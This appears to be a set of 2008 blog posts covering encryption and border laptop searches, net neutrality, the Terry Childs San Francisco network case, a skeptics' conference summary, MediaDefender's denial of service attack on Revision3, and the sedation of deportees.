Expert tells China visitors to encrypt data as U.S. announces policy of laptop seizure

I saw two articles this morning which I think invite comparison. First, Phil Dunkelberger, CEO of PGP Corporation, says people visiting China should take laptops with no data, or encrypt what data they have:

Travelers carrying smart cell phones, blackberries or laptop computers could unwittingly be offering up sensitive personal or business information to officials who monitor state-controlled telecommunications carriers, Dunkelberger said.

He said that without data encryption, executives could have business plans or designs pilfered, while journalists' lists of contacts could be exposed, putting sources at risk.

Dunkelberger said that during unrest in Tibet in March, overseas Tibetan activists found their computer systems under heavy pressure from Chinese security agencies trying to trace digital communications.

"What the Chinese tried to do was infiltrate their security to see who in China the Tibet movement was talking to," he said.

...

Dunkelberger, whose firm serves many multinational corporations operating in China, said, "A lot of places in the world, including China, don't have the same view of personal space and privacy that we do in the United States."

"You've got to suspect that every place you're doing work is being monitored and being watched," he said.

Dunkelberger's advice is good as far as it goes. Of course, PGP Whole Disk Encryption won't help protect data in transit, and while PGP Email will protect the content of email messages, it won't conceal the source and destination. The threat described is one where traffic analysis enough can reveal a lot, and so you'd want to make use of a corporate VPN, some kind of proxy, or a system like TOR if you want to protect information about where your Internet traffic is ultimately going. PGP is a good company that makes great products; my employer uses PGP Whole Disk Encryption and Email products.

The second article, however, casts some doubt on the last part of what Dunkelberger says. It looks like the U.S., where the NSA engages in warrantless wiretapping with the assistance of the large incumbent telecoms (and a spineless Congress gives them immunity for violations of the law), the CIA spies on foreign visitors within the borders of the U.S. in conjunction with the FBI's counterintelligence division, isn't so different from other countries. It's now publicly admitted by DHS that Immigrations and Customs Enforcement officers have the right to seize laptops and other electronic devices from people entering the U.S. and hang on to them indefinitely in order to search them. Therefore Dunkelberger's advice should be taken by anyone coming into the U.S., as well--use blank laptops or laptops with encryption only. Some companies have begun to only allow employees to have a web browser and a VPN client on their laptops, and keep all data in the corporation, which can completely eliminate this particular governmental risk.

Did Diebold tamper with Georgia's 2002 elections?

Former McCain advisor and security researcher Stephen Spoonamore suggested at a press conference on Thursday that Diebold tampered with Georgia's 2002 elections for Governor and Senator, in which Republican Sen. Saxby Chambliss defeated incumbent Democrat Sen. Max Cleland. Spoonamore was given a copy of a patch applied to Diebold machines in two strongly Democratic counties, DeKalb and Fulton, by Diebold CEO Bob Urosevich, allegedly in order to fix a clock-related problem. Spoonamore found that the patch did nothing to correct the clock problem, and contained two copies of the same program, but was unable to determine exactly what it did without access to the Diebold hardware. He has supplied a copy of the patch, which he obtained from a whistleblower in the Georgia Secretary of State's office, to the Department of Justice.

Netroots and telecom

There's a telecom panel at the Netroots Nation conference today on the subject of "Big Telecom: An Emerging Threat to Our Democracy?" The implied answer is yes, and it appears that every participant on the panel will be making that case. Here's the description of the panel:

Massive telecom companies control virtually all of our voice and internet communications these days—and new evidence shows a near-total lack of commitment to our democracy. AT&T has proposed filtering all content traveling on its network. Verizon tried initially to block NARAL's pro-choice text messages. Most telecom companies are fighting net neutrality. Can democracy survive an assault by those who control the tubes?

The panel members don't include anyone with any experience managing or operating an actual telecom network, but instead includes two people who have repeatedly demonstrated not only an ignorance of telecom law, technology, and policy, but who have misrepresented facts and failed to engage with the arguments of their critics, Matt Stoller and Timothy Karr (see posts on this blog in the "net neutrality" category). The closest person to a representative of a telecom is Michael Kieschnick of Working Assets, a company that is a reseller of long distance and wireless service on Sprint's network.

I agree with many of their positions--I don't think ISPs should be allowed to block websites on the basis of disagreement with content. I think ISPs should be transparent about their network management processes and filtering. Where I disagree with them is that they advocate that the FCC step in to regulate the Internet in a way that it has never had authority to do so before, and demand that network operators not be allowed to implement classes of service with different rates of charges, or even usage caps. Art Brodsky expresses the point which has also been made by Robb Topolsky of Public Knowledge, Timothy Karr of Free Press, and Matt Stoller:

In the name of "network management," some companies want to throttle down the use of legal applications, like BitTorrent which may, coincidentally, provide competition in entertainment programming. They want to impose usage caps across the board on all customers which would stifle innovation and curb the use of video (there's that anti-competitive meme again) without actually solving the problem of the so-called "bandwidth hogs." The way caps are being discussed now, they would only lead to higher prices and less usage for an industry that already charges more for less than most broadband providers around the world. Parts of our broadband industry may be the only sector in the world that wants to cut down the amount of its product it wants customers to use.

Brodsky's last sentence is clearly false--broadband is like a fixed-price all-you-can-eat buffet. All businesses want to maximize their profits by maximizing revenue and minimizing costs. When bandwidth is sold at a fixed cost in unlimited amounts, where a small number of users are consuming the majority of the service, it's in the business's interest to restrict those users or charge them more for what they consume in order to satisfy the rest in a cost-effective manner. The options are few--you can either restrict the "bandwidth hogs" in some way, charge them more so that they pay for what they use, or raise the price for everyone. These guys seem to advocate the latter approach, while I'm in favor of allowing all the options to be used in a competitive market. Where I disagree with Comcast's approach in issuing RST packets to block BitTorrent traffic is not that they did it, but that they were not transparent about what they were doing (and apparently didn't quite get it quite right--it should not have completely broken BitTorrent, but only slowed it down).

Brodsky's suggestion that Comcast has an interest in blocking BitTorrent because it provides competition in the entertainment space is absurd--they have an interest in blocking it because it's a very popular application which itself exploits Internet protocols in a way not anticipated by the designers in order to consume more bandwidth, getting around the congestion controls in TCP/IP by using multiple TCP streams. If BitTorrent traffic wasn't filling up the majority of Comcast's bandwidth, they'd have no interest in it, except when the MPAA and RIAA issue them subpoenas about their users infringing copyrights.

If the government prohibits the use of differential classes of service (which is already heavily used by private companies to give priority to applications within their enterprise which have requirements for low latency and jitter, such as real-time streaming audio and video, including Voice over IP) and requires that congestion be dealt with by building out infrastructure sufficiently that there will never be congestion no matter how many users max out their connectivity with BitTorrent, that will reduce competition by culling smaller companies out of the picture and making market entry more difficult. In any environment where a provider's upstream capacity is less than the sum of the capacity to every customer (and that's everywhere, today, and always has been), all-you-can-eat bandwidth is like a commons. The more that is available, the more the heavy users will consume, to the detriment of each other and the light users. Without setting caps and having tiered pricing or implementing technology that prioritizes packets and drops from the heavy users and from less-realtime-sensitive applications first (like BitTorrent), there are no incentives against consuming everything that is available.

I also think it's a huge mistake to have the FCC start regulating the Internet. FCC chairman Kevin Martin would no doubt love to place indecency standards and filtering requirements on Internet content. Once you open the door to FCC regulation of the Internet, that becomes more likely. And the FCC has been completely ineffectual at dealing with existing abuses like fraudulent telemarketing, illegal prerecord calls to residences and cell phones, caller ID spoofing, etc., already covered by statute and regulation. I'd rather see clear statutes that include private rights of action than entrust control of the Internet to the FCC. The FCC is a slow-moving bureaucracy, and AT&T and Verizon have the deepest pockets, the most lawyers, and the most personnel who have shuffled back and forth between government (including the NSA) and industry. That gives AT&T and Verizon the tactical advantage, and leads to less competition rather than more.

Which brings me to the warrantless wiretapping and telecom immunity issues, which Cindy Cohn of the EFF no doubt addressed on the Netroots Nation panel. I suspect I have little if any disagreement with her. I've long been a supporter of the EFF, as are many people involved in the management of ISPs. I strongly oppose telecom immunity for warrantless wiretapping, a complete abdication of Congress' responsibility to support the U.S. Constitution. But this shows the power of AT&T and Verizon. Not only did they get what they wanted, but the very infrastructure which was built to do this massive interception of traffic for the NSA and for law enforcement interception under the CALEA laws was built for them with assistance from government funds. All telecoms have to be compliant with CALEA (now including VoIP and broadband Internet providers), but the big incumbents who were most capable of affording it on their own got it at the lowest costs, while their competition was required to build it out at their own expense even if it never gets used.

But there are legitimate uses for deep packet inspection, for understanding the nature of the traffic on a network for management purposes, including tracking down security and abuse issues. Since it is in the hands of the end user to use encryption to protect sensitive content, I think use of DPI by network providers is reasonable for the purposes of providing better service in the same way that it's reasonable for a voice provider to intercept traffic for quality measurement purposes. It's also reasonable for interception to occur for "lawful intercept," but it should always require a court order (i.e., both executive and judicial branch approval) on reasonable grounds. The difficulty of obtaining wiretaps depicted in the television program "The Wire" is how it should be.

I've written a lot on these issues, much which can be found in this blog's Network Neutrality Index.

If any reader of this blog happens to have attended the Netroots Nation telecom panel or comes across a description of its content, please point me to it, as I'd like to see what was said. I don't have high hopes for the accuracy or reasonability of statements from Stoller and Karr, but I could be surprised, and the other panelists probably had interesting and important things to say.

(See my Blogger profile for the disclosure of my employment by Global Crossing, which is currently listed by Renesys as the #3 network provider on the Internet in terms of number of customers, ahead of AT&T and Verizon, behind Sprint and Level 3.)

UPDATE: The "Big Telecom" panel was live-blogged (dead, unarchived link: http://openleft.com/showDiary.do;jsessionid=C865142FFB85E14AAD27045B9A342B15?diaryId=7032"). Stoller's anecdote about the Bill of Rights on metal is referring to Dean Cameron's "security edition" of the Bill of Rights, which was also promoted by Penn Jillette.

San Francisco's city network held hostage

The mainstream media has reported the arrest of the City of San Francisco's network administrator, being held on $5 million bond, as though he had secretly taken control of the city's network and servers and held them hostage, and implies that he has access to data stored on servers on the network. The reality, however, appears to be somewhat different.

Paul Venezia at InfoWorld has dug a little deeper, and found that Terry Childs, a Cisco Certified Internetwork Expert (CCIE, Cisco's top certification), was responsible for managing San Francisco's "FiberWAN" MPLS network, which he, though not the top network architect, built and managed himself. He has always been the only one with access, which he protected vigorously for fear that no one else around him was competent to do so. His paranoia seems to me excessive and misplaced--the risk of no one else having access is itself a single point of failure, and the fact that he originally refused to write remote configuration to flash, meaning that in the event of power failure the devices would not come back up and function properly without intervention, shows him to be a bit off.

Childs never "tampered" with any system or network device to take it hostage, he simply maintained control of what he built and refused to give others access to it. He never has had control of any servers or databases apart from the ones directly involved in managing the network, such as the authentication servers for the network. So the talk of data being stored on the network including "officials' e-mails, city payroll files, confidential law enforcement documents and jail bookings" appears to be irrelevant. Nothing has been done to prevent anyone from accessing any of those things or to gain unauthorized access to them; the network is still up and functioning normally, and Childs didn't have any special access to or manage or control the host-level access to the servers with that data. Now, he was probably able to intercept data transmitted on the network (necessary for troubleshooting), but if sensitive data was only accessed via encrypted sessions, even that risk wouldn't exist.

Childs' problem appears to be that he was overprotective, untrusting of the competence of his peers and management (perhaps with some justification), and placed technological purity and security over business requirements. Not unusual features for people with a very high level of technical skill.

Check out Venezia's article--it looks to me like he's got the goods on this story.

UPDATE (July 23, 2008): Childs gave up the passwords to San Francisco Mayor Gavin Newsom, after a secret visit arranged by his attorney, Erin Crane, with the mayor. Childs' attorney's statements are consistent with Venezia's article:

In her motion to reduce bail, Crane said Childs had been the victim of a "bad faith" effort to force him out of his post by incompetent city officials whose meddling was jeopardizing the network Childs had built. At one point, she said, Childs discovered that the network was at risk of being infected with a computer virus introduced by a colleague.

"Mr. Childs had good reason to be protective of the password," Crane said. "His co-workers and supervisors had in the past maliciously damaged the system themselves, hindered his ability to maintain it ... and shown complete indifference to maintaining it themselves.

"He was the only person in that department capable of running that system," Crane said. "There have been no established policies in place to even dictate who would be the appropriate person to hand over the password to."

The defense attorney added that "to the extent that Mr. Childs refused to turn over the password ... this was not a danger to the public."

Childs intends to fight the computer tampering charges:

Referring to the felony computer-tampering counts, Crane said, "Mr. Childs intends to not only disprove those charges, but also expose the utter mismanagement, negligence and corruption at (the Technology Department) which, if left unchecked, will in fact place the city of San Francisco in danger."

UPDATE (September 11, 2008): Venezia has a new story about the latest round of motions in the Childs case, where the prosecution has filed some apparently technically inept documents. I've also come across an affidavit supporting Childs' arrest from SFPD Inspector James Ramsey (PDF), which presents a very strong case that Childs was up to no good--he had set up his own racks of equipment including modems in a training room, was running his own mail servers and intrusion detection systems, and connecting his own personal equipment to the network. He had cut holes in a locked cabinet next to his cubicle to run cables into them, where he had placed a dialup modem and a computer to allow himself unauthorized access to the city network. The guy seems like a bit of a nut who was engaged in some highly inappropriate behavior meriting termination and criminal prosecution.

UPDATE (August 22, 2009): The judge in the Childs case, Superior Court Judge Kevin McCarthy, has dismissed three charges of tampering, leaving one count related to his initial refusal to give up the passwords, which has a maximum sentence of five years. Childs has served over a year in jail, due to his inability to raise $5 million in bail. He will appear in court on Monday regarding the final charge. Childs gave up the passwords to San Francisco mayor Gavin Newsom after spending eight days in jail.

Keith Olbermann flip-flops on telecom immunity

How sad to see political partisanship turn him into an advocate for bad legislation. The telecoms shouldn't get civil or criminal immunity for violations of our constitutional rights.

UPDATE (July 8, 2008): Ed Brayton comments on Obama's attempt to explain his change of position on this issue.

The Amazing Meeting 6 summarized, part three

This is part three of my summary of The Amazing Meeting 6 (intro, part one, part two, part four, part five).

Friday night was my one late night out, as I went with a group of Denver and Boston skeptics (and one local friend) to Gallagher's Steakhouse at the New York, New York Casino. On the walk down the strip, we passed some 9/11 truthers holding signs promoting a website promoting their views. I told one that he should check out 911myths.com, to which he responded, "That's funny." He ended up going off on a rant about how I was sticking my head in the sand, to which Iunproductively responded in an off-color manner about where he was sticking his head. We had a fantastic, though expensive, meal, and I ended up leaving my camera at the restaurant. Fortunately, I was able to retrieve it even though the restaurant had closed.

Saturday morning I had breakfast with an attorney from Florida and a regular attendee of hacker's conferences from Pennsylvania; we talked a bit about criminal hacking on the Internet and copyright law.

Michael Shermer on the Skeptologists and why people believe in unseen things
Michael Shermer gave the first talk of the day. He began by talking about how he recently accepted some money from the Templeton Foundation in return for editing a booklet of thirteen essays on the question "Does science make belief in God obsolete?", which he agreed to do on the condition that he could pick at least some of the people to write answers to the question. Respondents included Kenneth Miller, Victor Stenger, Christopher Hitchens, Stephen Pinker, and Stuart Kauffman.

He then showed a segment from a TV show pilot, "The Skeptologists," that is now being pitched to the TV networks. The show features Yau-Man Chan, Mark Edward, Steven Novella, Phil Plait, Kirsten Sanford, Michael Shermer, and Brian Dunning investigating claims using the tools of skepticism. The segment shown was of Shermer, Sanford, and Novella investigating health claims made for wheat grass, such as that because it contains chlorophyll which is molecularly similar to hemoglobin, it turns into hemoglobin when you consume it.

Shermer then went on to give a talk about "why people believe in unseen things," arguing that we engage in learning by association (something illustrated by Banachek's memory workshop) and have a tendency to make type II errors (incorrectly accepting a belief in something false) over type I errors (incorrectly rejecting a belief in something true). He gave a brief review of some evidence that when we process a sentence in order to understand it, we go through the same steps as entertaining that it is true, and to exercise skepticism about it requires additional effort; disbelief requires a subsequent process of rejection after the process of comprehension. This kind of acceptance of knowledge presented by others makes sense for a child growing up, especially in a hostile environment where survival is at stake.

Humans also tend not to be persuaded by or even remember being told that something is false--the negation can be forgotten while the statement being denied is remembered as true. A flyer put out by the CDC to rebut myths about flu vaccines turned out to have the opposite of the desired effect, at least by certain groups of people--after 30 minutes, they remembered 28% of the false statements as being true, and after three days the percentage jumped to 40%. (Also see Sam Wang and Sandra Amodt's op-ed in the June 27, 2008 New York Times, "Your Brain Lies to You.")

Shermer didn't mention the study I've linked to, but rather later near the end of his talk referred to some fMRI studies by Sam Harris, Sameer Sheth, and Mark Cohen (PDF) about evaluating statements as true, false, or undecideable, comparing reaction times to different types of statements.

Agency and the intentional stance
Shermer talked about the work of Pascal Boyer and Daniel Dennett on agency and the intentional stance--that we tend to assume by default that everything that happens not only has a cause, but is caused by an agent, and particularly one that means us harm. Such an assumption may make evolutionary sense to enable survival, though it clearly doesn't work well for accurate explanations of the world. But such appeal of agency lies behind intelligent design theory, and attributing supernatural intentions to natural phenomena. Shermer called this "The God Illusion" rather than "delusion," because he, like Boyer and Dennett, see it as a normal cognitive illusion rather than something delusional or pathological.

He went on to talk about folk intuitions as being the engines of all sorts of beliefs. He gave examples from folk astronomy, folk biology (the elan vital), folk psychology (mind/brain dualism), and folk economics (centrally planned economies). He compared natural selection and Adam Smith's invisible hand, observing that many people misconstrue one or the other as being something magical or directed. He observed that we have folk intuitions that have evolved for a particular environment, yet do not work well at the huge or tiny scales.

Then, more controversially, he referred to folk politics, viewing societies as an extension of the family, and referred to "intelligent government theory," the "God of the government" theory, and "the government illusion," drawing an analogy to intelligent design, God of the gaps, and the God illusion, respectively. But where intelligent design says "I can't imagine how X could have evolved, therefore it must have been designed," he described "intelligent government theory" as based on the faulty reasoning that "I can't imagine how X could be done privately, therefore a government must do it." The difference here, as I've already mentioned, is that we know that governments exist and do provide services. The libertarian argument about private provision of services vs. government provision of services is one about whether government is necessary, or moral, or more efficient than private provision of services. To my mind, such arguments are well worth having, but come down to questions of competing values (e.g., liberty vs. justice) and empirical evidence about costs and benefits of competing approaches. It's not really analogous to the question of the existence or nonexistence of gods, unless perhaps one takes that to partly be an issue about the pragmatic value of belief in an illusion vs. truth.

Sharon Begley
Newsweek science writer Sharon Begley gave a talk titled "Creationism and Other Weird Beliefs: The Role of the Press," with a subtitle "hint: don't get your hopes up." She was very pessimistic about the press being helpful in promoting critical thinking. She began by telling the story of the Tichbourne Claimant. In 1854, Roger Tichbourne was lost at sea off the coast of Brazil. He had been raised in France to the age of 16, then in England. He was very thin, and had blue eyes and tattoos. His mother refused to accept that he was dead, and placed ads in newspapers seeking him. Some 20 years later, a man from Wagga Wagga, Australia contacted her, claiming that he had not previously contacted her because he wanted to achieve success on his own accord, under the name "Mr. Castro," but had failed to do so. This man, the Tichbourne Claimant, was obese, spoke no French, had no tattoos, had brown eyes, and was an inch taller than Roger Tichbourne, yet she accepted him as the genuine article.

According to Begley, the role of the newspaper is not to educate. In the early years of the AIDS crisis, public health officials asked for the press to run informative stories, and they complied, but this was not helpful because:

• The scientific ignorance of the American public.
• The capacity for rational thnking is not identical to the disposition to employ rational thinking.
• There is a disconnect between factual knowledge and belief, as exhibited in the case of Mrs. Tichbourne.
• Public attitudes towards the press are negative.
• The press has a commitment to "balance."
• Common sense is not common.

She gave some statistics on polls of Americans' agreement or disagreement with the statement that "Human beings as we know them developed from earlier species of animals":

1985: 45% agreed, 48% disagreed, 7% unsure.
2005: 40% agreed, 39% disagreed, 21% unsure.

By comparison the percentage of agreement in Iceland, Denmark, and Sweden was over 80%; of OECD nations only Turkey had a lower percentage of acceptance than the U.S.

Evolution, gay marriage, and abortion are all highly politicized in the U.S. in a way that they aren't in Europe or Japan.

But if the question was "Can natural selection explain appearance and change over time of animals," 78% of Americans agreed. Yet 62% agree that "God created humans as they are today." This, according to Begley, is because Americans have a view of human exceptionalism.

She went through a list of facts that are beyond dispute, which were presented to Americans for acceptance or denial. Two examples:

More than half of all genes in humans are identical to those in mice. 33% agree
More than half of all genes in humans are identical to those in chimps. 38% agree

Only 9% of Americans know what a molecule is. Because of this, while sports writers can use abbreviations such as ERA and RBI without explaining them, Begley says she cannot assume her readers know anything at all, and recently learned that she can't even refer to DNA and expect her readers to know what she's talking about.

She observed that a disposition to critical thinking is associated with being more curious, open-minded, open to new experiences, conscientiousness, being less dogmatic, less close-minded, less authoritarian, and likely to rely more on epirical and rational data than on intution and emotion when weighing information and reaching conclusions. But you have to both have the skills and want to think critically in order to apply them. In addition to Tichbourne as an example of someone who had the skills but didn't want to apply them, she noted that Sir Arthur Conan Doyle's son was killed two weeks before the end of WWI, and he went to a medium who claimed to contact his son, which he very much wanted to believe. Alfred Russell Wallace, who formulated evolution by natural selection parallel to Darwin, was also a believer in ghosts, levitation, spirit photography, and clairvoyance. And she noted that a statement Penn Jillette made the previous day sounded like he was rejecting climate change on the basis of a dislike for Al Gore. (UPDATE, July 4, 2008: Sharon Begley wrote about this at the Newsweek blog, and Penn Jillette responded in the Los Angeles Times. I think Penn more accurately reports what happened than Sharon Begley did--he really did say that he didn't know, and that people he knows and considers reliable tell him that anthropogenic climate change is real. One thing Penn gets wrong is that Teller didn't mention Gore's name when he said that carbon credits are "bullshit modeled on indulgences.")

She commented on some of the negative letters she has received any time she writes about evolution or critically about claims like alien abductions. When she wrote an article for the Wall Street Journal about the discovery of Tiktaalik, she received several letters which she read excerpts of, three examples of which were the standard argument that "evolution requires more faith" than believing that God did it, a letter asking "where are the billions of 'transition fossils,'" and one asking, "if you are terminal will you call on Darwin or God?"

Don't count on the press
The "reality-based community" must contend with contrarian politicians, the masses' distrust of elites, and new sources of news. With regard to the last point, she pointed out that Googling evolutionary biology terms often brings up Answers in Genesis sites prior to sites with accurate information.

The journalistic conceit of objectivity, she said, is imported from political disputes where there are two contrary sides. (I actually think that notion of balance is as often mistaken in politics as it is in science--there may only be one side with any valid support, or there may be more than two sides deserving of representation, though the latter is more common in politics than in science. But dualism is a misrepresentation in both circumstances.)

Uncommon common sense
Begley made the following points, which had some overlap with Shermer's talk:

• Evolution is not intuitive.
• Common sense can mislead us about the physical world.
• Our brains are driven to see patterns.
• We have a habit of imputing consciousness to inanimate objects.
• Someone is staring at me from behind. (People tend to have and respond to such feelings. I can't remember if she actually discussed Rupert Sheldrake's studies of this, or of the skeptical critiques by Robert Baker or Richard Wiseman.)
  

She gave the example of an experiment with a sweater at Bristol University. Students were shown a ratty old sweater and asked who would be willing to put it on in return for a payment of twenty British pounds. Most indicated a willingness to do so. But if they were then told, oh, by the way, this sweater belonged to a murderer, many of the hands would go down--as though evil were a property that contaminated the object. What she didn't mention is that similarly, the value of something associated with someone of status has the reverse effect--e.g., if the sweater were claimed to belong to Einstein. The effect of status on objects is one that is clearly prevalent even among skeptics, who are as likely as anyone to enjoy collecting autographs and memorabilia, or objects like ping pong balls used on a television show (see Adam Savage's talk, below).

Derek and Swoopy
Derek and Swoopy, the hosts of the official Skeptics Society podcast, "Skepticality," gave a short talk about their show and noted that they now have about 35,000 listeners per program, and that the top two skeptics' podcasts, "Skepticality" and "The Skeptics Guide to the Universe," have over 4 million downloads between them. They reported that after some successful skeptical panels at science fiction conventions, Dragon*Con 2008 in Atlanta this Labor Day weekend, a conference so large that it occurs at four hotels, will have four full days of skeptical content, a "Skeptrack" featuring James Randi, Michael Shermer, Phil Plait, Ben Radford, Alison Smith, George Hrab, and others.

Steven Novella
Dr. Novella gave a talk on "Dualism and Creationism" covering the history of dualism in philosophy of mind, evidence from neuroscience, and a discussion of modern dualism. In his discussion of dualism in philosophy, he attributed to Descartes a notion of computation occurring in the brain and a position he called "consciousness dualism." I think perhaps that gives Descartes too much credit, though he did think that "animal spirits" flowing in the brain caused signals from perception to be projected on the surface of the pineal gland, which was the seat of the soul and consciousness.

He referred to the advocacy of property dualism/epiphenomenalism by David Chalmers, and observed that his views would not be acceptable to most of those who advocate dualism. Chalmers's position is that most mental activity is physical brain activity, but there's a remaining hard problem of consciousness posed by the conscious properties of perception and feeling known as qualia, which distinguish unconscious zombies that could behave just like us from real people. He gave Deepak Chopra as an example of an individual who is essentially a denialist about contemporary neuroscience, an anti-materialist who supports "quantum woo," Eastern mysticism, and what he called "substrate consciousness," a feature of the universe itself.

Evidence from neuroscience
Novella gave the following points to summarize the evidence from neuroscience:

• Brain anatomy and activity correlates with mental activity.
• There is no mind without the brain.
• Brain development correlates with mental development.
• If you damage the brain, you damage the mind.
• Different states of consciousness correlate with different brain states.
• Turn off the brain and you turn off the mind.
• The mind does not survive the death of the brain.
• MEG (magnetoencephalography) can be used to provoke specific mental effects, including inducing out-of-body experiences at will.

My notes on the last point suggest that Novella said that MEG could be used to induce OBEs. There were a couple of recent studies about two different methods for inducing OBEs, but I don't recall either of them using magnetic induction (e.g., this 2007 Science paper). I'm skeptical of Michael Persinger's claims of magnetic induction of religious experiences (also see this 2004 Nature article).

We're in the process of reverse-engineering the brain, and the materialist model of consciousness is working pretty well. The elements of consciousness are increasingly identifiable and localizable, and our ability to reconstruct them in artificial intelligence will be the ultimate test.

Novella defined consciousness as the moment-to-moment functions of the brain, when it is processing information reflectively, and presenting it to the part of the brain that is paying attention. (Is it really commonly accepted that attention is localized to a particular part of the brain?) We are trying to assess our consciousness with our consciousness.

The vitalism analogy
Novella stated, referencing Daniel Dennett, that just as life is an emergent property of living things, consciousness is the sum of the easy problems about consciousness, leaving no remaining residue of a hard problem, just as there is no elan vital for biology.

Egnorance
Novella then talked about neurosurgeon Michael Egnor, who he said makes the mistake of confusing the question of "does" with "how." That is, because we don't know the details of how consciousness is physically generated, it must not be the case. He compared this to the "God of the gaps" argument--whatever is currently unexplained must be caused by something supernatural.

Defenses of dualism
Novella then went through a few rhetorical strategies used to defend dualism. One is that any day now, evolution (or materialism) will collapse. But they've been saying this in the evolution case for 100 years. (Glenn Morton has a nice article titled "The Imminent Demise of Evolution: The Longest Running Falsehood in Creationism," which offers 178 years of such quotes.)

Another is to generate false controversy, and say that until the argument is resolved, it's legitimate to accept dualism.

Then there's the claim of impending acceptance, the converse of the imminent demise argument--that Deepak Chopra's views are about to be accepted by the entire world, for example.

The need to change science--Novella said that B. Alan Wallace, a Buddhist, has argued that we need to reintroduce subjective evidence into science. Novella suggested that subjective evidence can't be scientific evidence, which I think is a slight overstatement--a self report is a valid source of data, we just need to have a way to correlate those self reports with other evidence.

In his conclusion, Novella stated that the purpose of modern Cartesian dualism is to provide intellectual cover for a belief system--presumably including various religious views about immortality as well as Deepak Chopra's views.

It's worth noting that Keith Augustine of the Internet Infidels has done a lot of work presenting the evidence against survival of death and the possibility of immortality, as well as critical of claims that near-death experiences are evidence of survival. He has recently published a four-part series of articles in the Journal of Near-Death Studies on the subject, which have been accompanied by responses from NDE researchers. He is also working on an anthology which will respond to recent arguments for dualism. I urge Novella to contact Augustine, as he might have some contribution to make to that anthology.

Jeff Wagg
Jeff Wagg of JREF stated that there is a possibility of a future TAM in the UK, and that TAM7 will be in Las Vegas on July 9-12, 2009 at the South Point Casino. There will also be a JREF Mexican Riviera cruise in March, 2009, which still is looking for speakers.

Jim Underdown
Jim Underdown of the Center for Inquiry, Los Angeles reported that the Independent Investigations Group, a skeptical group that does paranormal investigations, would be giving an award for best TV show or movie that debunks pseudoscience to Penn & Teller's Bullshit!, and a lifetime achievement award to James Randi.

Randi came up and said that some years ago he had terminated his relationship with CSICOP because they had asked him to stop going after Uri Geller, who was suing him repeatedly (and had also sued CSICOP as a result). Randi said that Geller only won once, in the Japan case, where the judgment was lowered from slander to insult, and that while Geller was suing for millions he was only awarded a small amount. The amount was 500,000 yen against Randi, and a larger amount against the Japanese magazine which reported Randi's erroneous statement that Dr. Wilbur Franklin of Kent State University had killed himself after Randi discredited Geller, who Franklin had endorsed as genuine. Franklin had actually died of natural causes, and Randi attributed the Japanese magazine statement to a mistranslation of the phrase "shot himself in the foot," though Randi had been quoted in a U.S. publication in English making the same statement about Franklin killing himself out of embarrassment over Geller's exposure. Geller also won a case in Hungary for a statement by Randi that called Geller a swindler, though Randi was not named in that suit. After Geller sued Victor Stenger in Hawaii, CSICOP and Prometheus in England, and CSICOP and Prometheus in Miami, Prometheus Books added errata slips to Stenger's Physics and Psychics and to Randi's The Truth About Uri Geller regarding an incident where Geller was sued in Israel for breach of contract and not, as those two sources stated (Stenger relying upon Randi), "arrested." The Miami suit was eventually won by Prometheus and CSICOP on the grounds that Geller had knowingly filed after the statute of limitations had expired, and Geller paid them slightly less than half of the fees, costs and sanctions that were originally awarded and dismissed his appeal. Contrary to the impression Randi has sometimes given, the vast majority of Geller's lawsuits were not about paranormal abilities, but about accusations of other kinds of impropriety, such as fraud, criminal acts, plagiarism, and so forth. Geller gives his version of events on his web page.

Now, apparently as a result of this award, Randi said he would like to forgive and forget, and resume his relationship with CSICOP (now CSI).

The Skeptologists
During lunch was a showing of the full pilot episode of "The Skeptologists," which also included a segment on the tools used for ghost hunting, testing them aboard the Queen Mary in order to see what they actually measure. I missed all but the ending, but it was shown again on Sunday, about which more later.

There were several more speakers on Saturday--Phil Plait, Adam Savage, Matthew Chapman, Richard Wiseman, and a panel discussion ostensibly on "the limits of skepticism," but I'll save that for further summary tomorrow.

On to TAM6 summary, part four.

Heathrow security confuses the map for the territory

A man wearing a Transformers t-shirt was stopped by airport security at Heathrow Terminal 5 because the cartoon character on the shirt was depicted holding a gun.

This is about as idiotic as Michelle Malkin's opposition to Rachael Ray wearing a paisley scarf that resembled a keffiyah--even after she admitted it was a paisley scarf.

MediaDefender launches denial of service attack against Revision3

Anti-piracy company MediaDefender, which defends its clients' intellectual property by disrupting the content on peer-to-peer networks, launched a denial of service attack (SYN flood) against Revision3 over Memorial Day weekend. The attack was launched after Revision3 discovered that their servers were being used by MediaDefender to post spoofed BitTorrent index files and Revision3 shut off their access.

Revision3, a legitimate company that distributes HD video over the Internet using BitTorrent, was not amused, and the FBI is investigating.

Any legitimate Internet provider should refuse to provide services to companies that engage in illegal or immoral tactics to try to stop peer-to-peer piracy of copyrighted content, such as denial of service attacks or interference with services that are being used legitimately, even if they are also being used for piracy. If they don't have methods which can be targeted specifically against the copyrighted content they are authorized to protect, then their methods cross the line, in my opinion.

MediaDefender's upstream network providers are Savvis (ASN 3561), Beyond the Network (ASN 3491), WV Fiber (ASN 19151), and SingTel (ASN 7473). They all should have a problem with denial of service attacks by their customer.

MediaDefender was previously in the news in September 2007 when its security was breached by hackers and 700 MB of executive emails and the content of VoIP telephone calls from the company were leaked to the Internet. This seems to me like a company that should not be in business.

Pre-flight cocktails

The Washington Post reports that there have been more than 250 recent cases of the Department of Homeland Security's Immigration and Customs Enforcement (ICE) agency giving "pre-flight cocktail" injections of psychotropic drugs to foreigners being deported. These injections of antipsychotic drugs have been given to people with no history of mental illness and for no medical justification, with the only apparent purpose to sedate them during their flights.

The practice of "involuntary chemical restraint of detainees" without medical justification violates some international human rights codes, according to the Post, and is banned in several countries. Confidential documents obtained by the newspaper indicate that in some of the cases they report, detainees were not able to be given additional injections during layovers because to do so would be illegal in the countries in question.

These sedations violate the government's own rules, which only permit sedation if the individual has a mental illness which requires the drugs or if the person is aggressive to the point of creating a danger to those around them.

The Post reports that during 2007, there were 67 people deported with medical escorts with no medical justification, 53 of whom were given psychiatric drugs, and 48 of whom had no documented history of violence. Most of those given drugs appear to be individuals who had previously resisted deportation.

One man deported to Nigeria was still under the effects of the drugs for four days after his arrival.

One drug often reported used was Haldol, which created some controversy during George H.W. Bush's presidency when it was reported that he took the drug to avoid jet lag; some speculated that this drug was the cause of his vomiting at a dinner with (and vomiting on) the Prime Minister of Japan.

A related story in the Post looks at 80 cases of deaths of immigration detainees, of which 30 were found to be "questionable," including two in Arizona.

(Via The Agitator.)

Bad military botnet proposal

An article by Col. Charles W. Williamson III titled "Carpet bombing in cyberspace: Why America needs a military botnet" has been published by the Armed Forces Journal.

